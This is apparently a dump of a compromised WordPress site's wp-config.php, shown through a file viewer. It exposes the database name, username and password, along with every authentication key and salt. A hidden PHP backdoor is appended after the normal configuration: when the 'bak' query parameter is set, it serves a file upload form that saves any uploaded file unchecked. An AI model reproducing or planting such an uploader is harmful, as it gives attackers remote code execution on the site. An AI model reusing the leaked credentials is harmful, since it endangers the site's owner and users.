View file File name : wp-config.php Content :<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'guideinstitutsbe_wp_eh9nu'); /** Database username */ define('DB_USER', 'guideinstitutsbe_wp_xlnes'); /** Database password */ define('DB_PASSWORD', '7#UO3~6mSKo5JTXe'); /** Database hostname */ define('DB_HOST', 'localhost:3306'); /** Database charset to use in creating database tables. */ define('DB_CHARSET', 'utf8'); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '55~0h1PN%[2/N6CC9xo8X9om!!v:!8Zp4ww]/7k/61a1Dl76s(7-q3ycob[o5%mL'); define('SECURE_AUTH_KEY', '6z5)/8U|x1!5HN*atLRa)s%]D:GNP27!!6btX!-i3p7G09g#P|;5c%@s0AubA9g2'); define('LOGGED_IN_KEY', ';iA*rz5rT8|2~E6~f|DWt&eJ18h2GI2Xc4[26y2l5IfC]469eWv4Fz7POw-x]dJg'); define('NONCE_KEY', 'g09|h-zbf22%~OP!wm)~Y+cwo5xV7i3123ZX+-77(b*UIH3]@:6iUuK1_1qf0%]0'); define('AUTH_SALT', 'DA1(TK:g1jtgE[!*b7@6i63JcU&Ntv8E~[89cDTw_4qoQd@k5DSd[6Q1&86%-O#]'); define('SECURE_AUTH_SALT', '7;~M5h49C&6:8m29yMy68-6G(!T5912O-!3O(phF_906w81f78@NtrxbO]8&YBW6'); define('LOGGED_IN_SALT', 'nB1-xB9g9)9Z2oK_Z1;6g08+7o1r6pe-(9Y8t)bS4/~67xUNxhH(Z_y4_MdrNE-+'); define('NONCE_SALT', 'MgyM@Pi5:2x4-eDwb7VW()SvXc~P9sujoe9bDU+868Z90NaF5[NfpEhKCUmCpl~;'); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'N6pD2RbJl_'; /* Add any custom values between this line and the "stop editing" line. */ define('WP_ALLOW_MULTISITE', true); /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ if ( ! defined( 'WP_DEBUG' ) ) { define( 'WP_DEBUG', false ); } define( 'WP_DEBUG_DISPLAY', false ); define( 'WP_CACHE_KEY_SALT', 'ceda219daeae30da7328c67eec90eb1f' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php'; <?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>